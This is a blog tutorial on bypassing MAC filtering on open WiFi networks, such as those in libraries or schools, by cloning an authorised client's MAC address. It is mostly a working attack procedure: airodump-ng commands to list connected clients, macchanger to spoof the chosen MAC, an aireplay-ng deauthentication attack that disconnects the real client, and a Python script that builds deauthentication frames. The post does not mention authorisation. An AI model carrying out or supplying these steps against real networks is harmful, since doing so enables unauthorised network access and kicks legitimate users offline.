by hash3liZer . 04 June 2018
In this tutorial, we will see how a wireless network with no encryption at all protects itself with a list of authorized clients, and how we can get past that. What we are talking about is MAC filtering: a router feature that uses a stored list of MAC addresses to decide whether a client is permitted to connect to the network.
Sometimes, in a public place such as a library or an educational institute, you see open WiFi networks with no encryption that look available to everyone. That is not always the case: you may have tried to connect to one and the connection just never happens. Either the attempt takes far too long to respond, or the network simply ends up saved in your list of networks without ever connecting.
That behaviour comes from a MAC filter enabled in the router settings. The router is instructed to handle clients based on a list of MAC addresses, either as a deny list (dissociate the clients on it) or as an allow list (permit only the clients on it). When a new connection attempt arrives, the router firmware makes its decision for that client based on this list, if filtering is enabled.
So what is really protecting the network here is the client's MAC address. On an 802.11 network the MAC address is carried unencrypted in the header of every frame, whether data frames or the probe and other management frames a client transmits at regular intervals, and that is true with or without encryption on the network. Hence it is available for us to see, copy and use.
The idea here is to first get the MAC addresses of all the connected clients, take over one client's MAC address, deauthenticate that client from the access point, and connect to the WiFi in its place.
Get the MAC addresses of all the connected clients with airodump-ng. Put the card into monitor mode first, then lock airodump-ng to the target access point and its channel; the connected clients are listed in the STATION column:
airmon-ng start wlan0
airodump-ng --bssid [ AP BSSID ] -c [ AP CHANNEL ] wlan0mon
Now change the MAC address of the interface you will connect with (here a second card, wlan1, so that wlan0mon stays in monitor mode for the deauthentication step below) to the MAC address of the client you picked from the list:
ifconfig wlan1 down
macchanger -m [ CLIENT MAC ] wlan1
ifconfig wlan1 up
Now we have to disconnect the target client from the access point. Remember, a network cannot have two clients with the same MAC address. The data link layer (layer 2) of the network model moves frames from one node to the next and identifies each node by its MAC address, which is supposed to be unique to a network adapter; the access point keeps its association state per MAC address as well. Two stations using the same MAC address to communicate with other resources at the same time would clash in that state and in the switching tables behind the access point, and traffic for both would go wrong.
Hence it is always advisable to kick the target client off before you connect with its address.
aireplay-ng -0 0 -a [ AP MAC ] -c [ CLIENT MAC ] wlan0mon
Note the parameters:
-0 0 : deauthentication attack; the number is how many deauthentication bursts to send, and 0 means keep sending until you stop it
-a [ AP MAC ] : the BSSID of the access point
-c [ CLIENT MAC ] : the MAC address of the client to deauthenticate; without it aireplay-ng deauthenticates every client of the access point
Keep in mind that the client's MAC address is now also yours, so stop aireplay-ng (Ctrl-C) or use a small count such as -0 5 before you connect; otherwise the deauthentication frames kick your own connection off too.
Now you can connect with wlan1, which carries the borrowed MAC address, to the open network just as you would to any other, and the router's filter sees an address that is on its list.
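As an added example (not from the original post, and not aircrack-ng's own code), the following Python script shows the two protocol facts the procedure above relies on: that the station MAC address sits unencrypted in the header of every 802.11 frame, so a capture on the access point's channel yields the same station list airodump-ng prints, and what the deauthentication frame that aireplay-ng -0 transmits actually looks like. All addresses and the sample capture are constructed test data, and the function and constant names are my own assumptions.

```python
# Added example, not from the original post: a minimal 802.11 MAC header parser
# that recovers the station (client) MACs of one BSSID from raw frames, the way
# airodump-ng builds its STATION list, plus a builder for the deauthentication
# frame that aireplay-ng -0 sends. All MACs and frames below are constructed
# sample data, not a real capture.
import struct

# Constructed sample addresses (assumptions, not real devices).
AP_BSSID = "00:11:22:33:44:55"
CLIENT_A = "aa:bb:cc:00:00:01"
CLIENT_B = "aa:bb:cc:00:00:02"
OTHER_AP = "66:77:88:99:aa:bb"
UPSTREAM = "02:00:00:00:00:99"      # a wired host behind the AP (addr3 in data frames)
BROADCAST = "ff:ff:ff:ff:ff:ff"

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12


def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def is_group_address(mac):
    # Bit 0 of the first octet set means multicast/broadcast: never a single station.
    return int(mac.split(":")[0], 16) & 1 == 1


def parse_80211_header(frame):
    """Decode the 24-byte MAC header that every 802.11 frame carries in the clear."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a 24-byte 802.11 header")
    fc0, fc1 = frame[0], frame[1]
    return {
        "type": (fc0 >> 2) & 0x3,       # 0 = management, 1 = control, 2 = data
        "subtype": (fc0 >> 4) & 0xF,
        "to_ds": bool(fc1 & 0x1),       # frame travels station -> AP
        "from_ds": bool(fc1 & 0x2),     # frame travels AP -> station
        "addr1": bytes_to_mac(frame[4:10]),
        "addr2": bytes_to_mac(frame[10:16]),
        "addr3": bytes_to_mac(frame[16:22]),
    }


def associated_clients(frames, bssid):
    """Station MACs seen exchanging data frames with bssid (airodump-ng's STATION column)."""
    clients = set()
    for frame in frames:
        h = parse_80211_header(frame)
        if h["type"] != TYPE_DATA:
            continue
        if h["to_ds"] and not h["from_ds"] and h["addr1"] == bssid:
            clients.add(h["addr2"])            # STA -> AP: addr1 = BSSID, addr2 = station
        elif h["from_ds"] and not h["to_ds"] and h["addr2"] == bssid:
            if not is_group_address(h["addr1"]):
                clients.add(h["addr1"])        # AP -> STA: addr2 = BSSID, addr1 = station
    return clients


def build_deauth(ap_mac, client_mac, reason=7, seq=0):
    """AP -> station deauthentication frame (type 0, subtype 12), as aireplay-ng -0 sends it.
    Reason 7 = class 3 frame received from a non-associated station, aireplay-ng's default."""
    frame_control = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2), 0x00])
    duration = struct.pack("<H", 0x013A)
    seq_ctrl = struct.pack("<H", seq << 4)
    body = struct.pack("<H", reason)              # the whole body is the 2-byte reason code
    return (frame_control + duration + mac_to_bytes(client_mac)
            + mac_to_bytes(ap_mac) + mac_to_bytes(ap_mac) + seq_ctrl + body)


def _frame(ftype, subtype, to_ds, from_ds, addr1, addr2, addr3):
    """Constructed test frame: a 24-byte header with the given flags plus a dummy payload."""
    fc0 = (subtype << 4) | (ftype << 2)
    fc1 = (0x1 if to_ds else 0) | (0x2 if from_ds else 0)
    header = (bytes([fc0, fc1]) + b"\x00\x00" + mac_to_bytes(addr1)
              + mac_to_bytes(addr2) + mac_to_bytes(addr3) + b"\x00\x00")
    return header + b"\xaa" * 8


# Constructed capture: what a monitor-mode interface on the AP's channel might see.
SAMPLE_CAPTURE = [
    _frame(TYPE_MGMT, SUBTYPE_BEACON, 0, 0, BROADCAST, AP_BSSID, AP_BSSID),  # beacon, no client
    _frame(TYPE_DATA, 0, 1, 0, AP_BSSID, CLIENT_A, UPSTREAM),                # CLIENT_A -> AP
    _frame(TYPE_DATA, 8, 0, 1, CLIENT_B, AP_BSSID, UPSTREAM),                # AP -> CLIENT_B (QoS data)
    _frame(TYPE_DATA, 0, 0, 1, BROADCAST, AP_BSSID, AP_BSSID),               # AP broadcast, not a client
    _frame(TYPE_DATA, 0, 1, 0, OTHER_AP, "de:ad:be:ef:00:01", UPSTREAM),     # other network, ignored
]

if __name__ == "__main__":
    print("stations on", AP_BSSID, "->", sorted(associated_clients(SAMPLE_CAPTURE, AP_BSSID)))
    print("deauth frame:", build_deauth(AP_BSSID, CLIENT_A).hex())
```

The association logic is the part worth studying: with To DS set the station is addr2 and the BSSID addr1, with From DS set it is the other way round, and anything with a group bit in the destination is the AP talking to everyone rather than to one client. aireplay-ng actually sends the deauthentication in both directions (the frame above plus a mirror with addr1 = AP and addr2 = client); a real capture would come from a pcap with the radiotap header stripped before the bytes reach parse_80211_header.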
We've seen how open wireless networks lead people on by using a filtered list of authorized clients, and how that keeps everyone else from connecting. Then we saw that these devices send their MAC addresses in the clear at regular intervals, in frames we can capture with the well-known airodump-ng utility. Finally we took over a client's MAC address, kicked that client off and connected to the network in its place.